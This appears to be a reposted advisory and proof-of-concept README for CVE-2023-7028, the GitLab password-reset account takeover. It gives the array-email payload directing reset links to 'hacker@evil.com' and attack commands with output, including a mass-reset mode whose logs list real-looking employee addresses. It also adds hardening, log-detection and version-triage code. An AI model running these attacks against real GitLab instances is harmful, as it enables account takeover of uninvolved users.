GitLab Account-Take-Over Vulnerability

Vulnerability Information

Name: GitLab Account-Take-Over Vulnerability

Identifiers:

  • CVE: CVE-2023-7028

Type: Authentication bypass (weak password-recovery mechanism)

Severity: High (GitLab's own advisory rates it Critical, CVSS 10.0)

Description: GitLab is a widely used open-source code hosting and collaboration platform that supports version control and continuous integration/continuous deployment (CI/CD). It is deployed in enterprises, software development teams and educational institutions and is valued by developers for its feature set and flexibility. CVE-2023-7028 is an account-takeover vulnerability that lets an attacker take control of a GitLab account, including administrator accounts, without any user interaction. The root cause is in how email addresses are handled during the password-reset flow: the reset form accepts more than one address, and the reset link is sent to every address supplied. By submitting the target account's address together with their own, the attacker receives a valid reset link and can set a new password for the administrator. GitLab notes that two-factor authentication (2FA) prevents the takeover, because even after resetting the password the attacker cannot complete the login. The vulnerability was reported by asterion04 and is present in multiple GitLab versions. Exploitation can lead to full account compromise, leakage of sensitive data and service disruption. The attack can be automated and requires no authentication of any kind, which greatly increases its impact.

Vendor: GitLab

Product: GitLab (Community Edition and Enterprise Edition)

Affected versions: 16.1 <= version <= 16.1.5, 16.2 <= version <= 16.2.8, 16.3 <= version <= 16.3.6, 16.4 <= version <= 16.4.4, 16.5 <= version <= 16.5.5, 16.6 <= version <= 16.6.3, 16.7 <= version <= 16.7.1

Source: https://github.com/szybnev/CVE-2023-7028

Collection category: CVE-2023: GitHub search

Repository files

  • .gitignore
  • CVE-2023-7028.py
  • README.md

Source overview

CVE-2023-7028 | Account-Take-Over Gitlab

Disclaimer

This code is a proof of concept of the vulnerability; I'm not pushing anyone to use it on GitLab instances they don't own.
This tool has been developed for research and educational purposes only, and I will not be held responsible for any use you may make of it.

Description

This is a fork of the repo https://github.com/Vozec/CVE-2023-7028. I only improved the exploit usage.

CVE-2023-7028 is an account-takeover vulnerability that lets an unauthenticated attacker take control of a GitLab account, including the administrator account, without any user interaction.

The flaw is in how email addresses are handled when a password reset is requested. The reset form accepts the email field as an array: an attacker can supply two addresses, and the reset link is sent to both.
It is therefore enough to submit the target account's address together with the attacker's own address, follow the link that arrives in the attacker's inbox, and set a new password for the administrator.
(GitLab points out that two-factor authentication prevents the takeover: the attacker can still reset the password but cannot complete the login without the second factor. The legitimate user's password is still changed, so the attempt is not silent.)

This vulnerability was discovered by asterion04.

Payload

Here's an example payload. It is the form body of the reset request (the POST to /users/password); the [] suffix on user[email] makes the framework parse the field as an array, so both addresses are accepted as reset recipients:

user[email][]=my.target@example.com&user[email][]=hacker@evil.com
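The following is an added illustration of the two points above (the array-valued email field and the reset handler that mails every address it was given). It is not GitLab's code and not the PoC's code: it is a minimal re-implementation of the vulnerable pattern next to a hardened handler that accepts a single string and mails only the address on file for the account. The bracket-parameter parser is an assumed approximation of how Rack-style frameworks turn a[b][]=x&a[b][]=y into {"a": {"b": ["x", "y"]}}, and the account store and outbox are constructed stand-ins.

```python
"""Vulnerable vs. hardened password-reset handler (added example, not GitLab's code)."""
import secrets
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl

# Constructed account store (email -> username); stands in for the users table.
ACCOUNTS: Dict[str, str] = {"my.target@example.com": "root"}

# Constructed outbox of (recipient, reset link); stands in for the mailer.
SENT_MAIL: List[Tuple[str, str]] = []


def parse_rack_params(body: str) -> dict:
    """Assumed Rack-style nested parameter parser (not Rack itself).

    user[email]=a                      -> {"user": {"email": "a"}}
    user[email][]=a&user[email][]=b    -> {"user": {"email": ["a", "b"]}}
    """
    out: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if "[" not in key:
            out[key] = value
            continue
        top, rest = key.split("[", 1)
        parts = rest.rstrip("]").split("][")     # "email][" -> ["email", ""]
        is_list = parts[-1] == ""                 # trailing [] means "append"
        if is_list:
            parts = parts[:-1]
        node = out.setdefault(top, {})
        *middle, last = parts
        for name in middle:
            node = node.setdefault(name, {})
        if is_list:
            node.setdefault(last, []).append(value)
        else:
            node[last] = value
    return out


def _make_link(base_url: str) -> Tuple[str, str]:
    token = secrets.token_urlsafe(15)
    return token, f"{base_url}/users/password/edit?reset_password_token={token}"


def vulnerable_reset(body: str, base_url: str) -> Optional[str]:
    """Vulnerable pattern: the lookup tolerates a list, and the link is mailed
    to every submitted address instead of to the account's own address."""
    submitted = parse_rack_params(body).get("user", {}).get("email")
    addresses = submitted if isinstance(submitted, list) else [submitted]
    if not any(addr in ACCOUNTS for addr in addresses):   # no matching account
        return None
    token, link = _make_link(base_url)
    for addr in addresses:        # BUG: attacker-supplied recipients get the link too
        SENT_MAIL.append((addr, link))
    return token


def hardened_reset(body: str, base_url: str) -> Optional[str]:
    """Hardened: accept exactly one string, and send the link only to the
    address stored on the matched account."""
    submitted = parse_rack_params(body).get("user", {}).get("email")
    if not isinstance(submitted, str):
        raise ValueError("user[email] must be a single address, not an array")
    if submitted not in ACCOUNTS:
        return None               # caller shows the same message either way (no enumeration)
    token, link = _make_link(base_url)
    account_email = submitted     # the address on file for the matched account
    SENT_MAIL.append((account_email, link))
    return token


def demo(payload: str, base_url: str = "https://gitlab.example.com") -> dict:
    """Run one payload through both handlers and report who received mail."""
    SENT_MAIL.clear()
    vulnerable_reset(payload, base_url)
    vulnerable_recipients = [to for to, _ in SENT_MAIL]
    SENT_MAIL.clear()
    try:
        hardened_reset(payload, base_url)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable_recipients": vulnerable_recipients,
        "hardened_rejected": rejected,
        "hardened_recipients": [to for to, _ in SENT_MAIL],
    }


if __name__ == "__main__":
    PAYLOAD = "user[email][]=my.target@example.com&user[email][]=hacker@evil.com"
    print(demo(PAYLOAD))
```

Running demo() on the payload from the page shows the vulnerable handler mailing the same token to my.target@example.com and hacker@evil.com, while the hardened handler rejects the array outright; a plain user[email]=my.target@example.com still works in both. The important design choice is the last line of the hardened handler: the recipient comes from the account record, never from the request, so even if a type check is bypassed the link cannot be redirected.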

POC

Method 1: Using temp email (single target)

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com

[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: 6grp7ert9y@laafd.com
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = bc91lpzwTOaY9dg5SWjLvvDDb61j6ZunCX4DXYlSnWz9Y3zK35SPiLNShhrDrPVDgY_AzQjzpD5qVt2WXeolog
[DEBUG] Sending reset password request
[DEBUG] Emails sended to my.target@example.com and hacker@evil.com !
[DEBUG] Waiting mail, sleeping for 7.5 seconds
[DEBUG] Getting link using temp-mail | Try N°1 on 5
[DEBUG] Getting last mail for 6grp7ert9y@laafd.com
[DEBUG] 1 mail(s) found
[DEBUG] Reading the last one
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = RN6gypVz7Zxtu2zRsJmKPsDHNumIH_UPvdn7aQoWRBnUcqmW1hcu8kYcMvI6XbTDsYuZieMFypbe8SWi3q781w
[DEBUG] Changing password to l3mG2v2XN4UBzbN18ZkW
[DEBUG] CVE_2023_7028 succeed !
You can connect on https://gitlab.example.com/users/sign_in
Username: my.target@example.com
Password: l3mG2v2XN4UBzbN18ZkW

Method 2: Using evil email (single target)

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com -e hacker@evil.com

[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = 1Yt1EUeWSL-oiSV7v1Z6ghdCDG3w0FFCQB8Uc5B5GAodVNJ26OlPT8HtYYleGXB9F0otas3gnHOtRfhFall8pQ
[DEBUG] Sending reset password request
[DEBUG] Emails sended to my.target@example.com and hacker@evil.com !
Input link received by mail: https://gitlab.example.com/users/password/edit?reset_password_token=U8PSU7DXdebdTD3GjMiX
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = N7gs43C9ZMxdniA9UEzzfH2Rlhgejt75M1Kw88vaarP_Z4uE38JjPDT6ZM-xA_mDfZm3HyO-E8jeCFzFMfoOHA
[DEBUG] Changing password to EU7XIYjlawjb5tH2jgmU
[DEBUG] CVE_2023_7028 succeed !
You can connect on https://gitlab.example.com/users/sign_in
Username: my.target@example.com
Password: EU7XIYjlawjb5tH2jgmU

Method 3: Using email list from file

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting full attacks on 806 target(s) with rate limit 10 rps
[DEBUG] Processing target 1/806: vkuzmina@korusconsulting.ru
[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: abc123xyz@laafd.com
[DEBUG] Reset request sent successfully for vkuzmina@korusconsulting.ru
...
[DEBUG] Attack completed: 800/806 requests sent, 750/806 passwords reset

Method 4: Skip mode - only send reset requests (faster)

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt --skip -rps 20

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting reset requests on 806 target(s) with rate limit 20 rps
[DEBUG] Processing target 1/806: vkuzmina@korusconsulting.ru
[DEBUG] Reset request sent successfully for vkuzmina@korusconsulting.ru
[DEBUG] Processing target 2/806: mromanenko@korusconsulting.ru
[DEBUG] Reset request sent successfully for mromanenko@korusconsulting.ru
...
[DEBUG] Reset requests completed: 800/806 successful

Help

$ python3 ./CVE-2023-7028.py -h
usage: CVE-2023-7028.py [-h] -u URL (-t TARGET | -l EMAIL_LIST) [-e EVIL] [-p PASSWORD] [--skip] [-rps RATE_LIMIT]

This tool automates CVE-2023-7028 on gitlab

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Gitlab url
  -t TARGET, --target TARGET
                        Target email
  -l EMAIL_LIST, --list EMAIL_LIST
                        File with target emails list
  -e EVIL, --evil EVIL  Evil email
  -p PASSWORD, --password PASSWORD
                        Password
  --skip                Skip password reset, only send reset requests
  -rps RATE_LIMIT, --rate RATE_LIMIT
                        Requests per second (default: 10)

Usage Notes

  • Single target: use -t to attack a single email address
  • Multiple targets: use -l to load email addresses from a file (one per line)
  • Evil email: without --evil, the script requests a throwaway inbox on the public 1secmail.com service and polls it for the reset link, so the link that grants control of the target account passes through a third-party mailbox you do not control. Prefer --evil with an address you own during pentests
  • Skip mode: --skip only sends the reset requests and does not wait for the mail or change any password (faster for mass runs); each request still triggers a reset email to the target
  • Rate limiting: -rps sets requests per second (default: 10). Higher values are faster but more detectable, since every request is a reset email to a real user and a log entry on the server
  • Email list format: plain text file with one email per line
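The notes above point out that every request is visible server-side. As an added example (not part of the PoC repo or of GitLab's own tooling), the following detector implements the check GitLab's advisory describes for this CVE: read gitlab-rails/production_json.log and flag POST requests to /users/password whose email parameter is a JSON array with more than one address. The log lines are constructed to approximate that log's shape (time, method, path, remote_ip, and params as key/value pairs); the exact field names are an assumption to verify against a real instance before relying on the result.

```python
"""Detect CVE-2023-7028 reset requests in GitLab-style JSON request logs (added example)."""
import json
from collections import Counter
from typing import Any, Dict, List

# Constructed sample log: one two-address attack request, one normal reset,
# one non-JSON line, and one single-element array (not the advisory's pattern).
SAMPLE_LOG = "\n".join([
    json.dumps({"time": "2024-01-12T09:14:01Z", "method": "GET", "path": "/users/password/new",
                "status": 200, "remote_ip": "203.0.113.7", "params": []}),
    json.dumps({"time": "2024-01-12T09:14:03Z", "method": "POST", "path": "/users/password",
                "status": 302, "remote_ip": "203.0.113.7",
                "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                           {"key": "user", "value": {"email": ["my.target@example.com",
                                                               "hacker@evil.com"]}}]}),
    json.dumps({"time": "2024-01-12T09:20:11Z", "method": "POST", "path": "/users/password",
                "status": 302, "remote_ip": "198.51.100.20",
                "params": [{"key": "user", "value": {"email": "legit.user@example.com"}}]}),
    "2024-01-12T09:21:00Z this line is not JSON and must be skipped",
    json.dumps({"time": "2024-01-12T09:22:09Z", "method": "POST", "path": "/users/password",
                "status": 302, "remote_ip": "203.0.113.7",
                "params": [{"key": "user", "value": {"email": ["other@example.com"]}}]}),
])


def email_param(params: Any) -> Any:
    """Return the raw user[email] value from a params list: str, list or None."""
    for entry in params or []:
        if isinstance(entry, dict) and entry.get("key") == "user":
            value = entry.get("value")
            if isinstance(value, dict):
                return value.get("email")
    return None


def find_reset_abuse(log_text: str) -> List[Dict[str, Any]]:
    """One finding per POST /users/password whose email field arrived as an array.
    Two or more addresses is the CVE-2023-7028 pattern; a one-element array is
    still not what the normal form sends, so it is reported as a probe."""
    findings: List[Dict[str, Any]] = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue                      # non-JSON noise in the file
        if event.get("method") != "POST" or event.get("path") != "/users/password":
            continue
        email = email_param(event.get("params"))
        if not isinstance(email, list):
            continue                      # plain string: the form's normal behaviour
        findings.append({
            "time": event.get("time"),
            "remote_ip": event.get("remote_ip"),
            "emails": [str(e) for e in email],
            "kind": "takeover_attempt" if len(email) > 1 else "array_probe",
        })
    return findings


def sources_by_ip(findings: List[Dict[str, Any]]) -> Dict[str, int]:
    """Takeover attempts per source IP, the pivot for blocking and for further log review."""
    return dict(Counter(f["remote_ip"] for f in findings if f["kind"] == "takeover_attempt"))


def targeted_accounts(findings: List[Dict[str, Any]]) -> List[str]:
    """Every address seen in a takeover attempt. One of each pair is the victim and the
    other the attacker's drop box; both belong in the incident record, and the victim's
    password and sessions need to be reset."""
    seen = {e for f in findings if f["kind"] == "takeover_attempt" for e in f["emails"]}
    return sorted(seen)


if __name__ == "__main__":
    hits = find_reset_abuse(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("by ip:", sources_by_ip(hits))
    print("accounts:", targeted_accounts(hits))
```

The advisory also points at gitlab-rails/audit_json.log entries from PasswordsController#create whose target_details is an array; the same isinstance(list) test applies there, only the field path differs. A hit is not proof of a completed takeover, so the follow-up is to check whether a password change and a login from the same source followed the reset request.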

Examples

## Single target with custom password
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t admin@example.com -p MyCustomPass123

## Mass attack with slower rate limit
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt -rps 5

## Send reset requests only, without waiting for the mail or changing any password
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt --skip -rps 50

Versions concerned

  • 16.1 to 16.1.5
  • 16.2 to 16.2.8
  • 16.3 to 16.3.6
  • 16.4 to 16.4.4
  • 16.5 to 16.5.5
  • 16.6 to 16.6.3
  • 16.7 to 16.7.1
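For triaging a fleet against the ranges above, here is an added helper that is not part of the PoC. It encodes the affected minor branches together with the first patched release GitLab shipped for each (16.1.6, 16.2.9, 16.3.7, 16.4.5, 16.5.6, 16.6.4, 16.7.2) and reports which instances still need the upgrade. Version strings are assumed to look like the value returned by GitLab's /api/v4/version endpoint (for example "16.5.3-ee"); the instance inventory is constructed.

```python
"""Map GitLab version strings to CVE-2023-7028 exposure (added example)."""
from typing import Dict, Optional, Tuple

# First fixed release per affected minor branch (same ranges as the list above).
FIXED_IN: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (16, 1): (16, 1, 6), (16, 2): (16, 2, 9), (16, 3): (16, 3, 7), (16, 4): (16, 4, 5),
    (16, 5): (16, 5, 6), (16, 6): (16, 6, 4), (16, 7): (16, 7, 2),
}

# Constructed inventory: instance name -> version as reported by /api/v4/version.
INVENTORY: Dict[str, str] = {
    "git-a": "16.4.2-ee",   # inside 16.4 <= v <= 16.4.4
    "git-b": "16.6.4",      # first fixed 16.6 release
    "git-c": "15.11.13",    # predates the bug
    "git-d": "16.7.1-ce",   # last vulnerable 16.7 release
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """'16.5.3-ee' -> (16, 5, 3); '16.7' -> (16, 7, 0). Anything after '-' (edition,
    pre-release tag) is ignored; a missing patch component counts as 0."""
    core = text.strip().split("-", 1)[0]
    nums = [int(p) for p in core.split(".") if p.isdigit()]
    if not nums:
        raise ValueError(f"unparseable version: {text!r}")
    nums = (nums + [0, 0, 0])[:3]
    return nums[0], nums[1], nums[2]


def fix_for(version: str) -> Optional[str]:
    """Return the release to upgrade to if `version` is in an affected range, else None.
    Branches before 16.1 never had the bug and 16.8+ shipped with the fix, so only the
    seven branches in FIXED_IN can be vulnerable."""
    v = parse_version(version)
    fixed = FIXED_IN.get(v[:2])
    if fixed is None or v >= fixed:
        return None
    return ".".join(str(n) for n in fixed)


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """instance -> required upgrade, for every instance that is still vulnerable."""
    result: Dict[str, str] = {}
    for name, version in inventory.items():
        fix = fix_for(version)
        if fix is not None:
            result[name] = fix
    return result


if __name__ == "__main__":
    for name, fix in triage(INVENTORY).items():
        print(f"{name}: vulnerable, upgrade to {fix}")
```

Treat the result as a starting point only: an instance that was vulnerable before it was patched may already have been exploited, and the version check says nothing about that.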

Page: http://example.com/2025/07/21/github_1610417089/
Author: lianccc
Published: July 21, 2025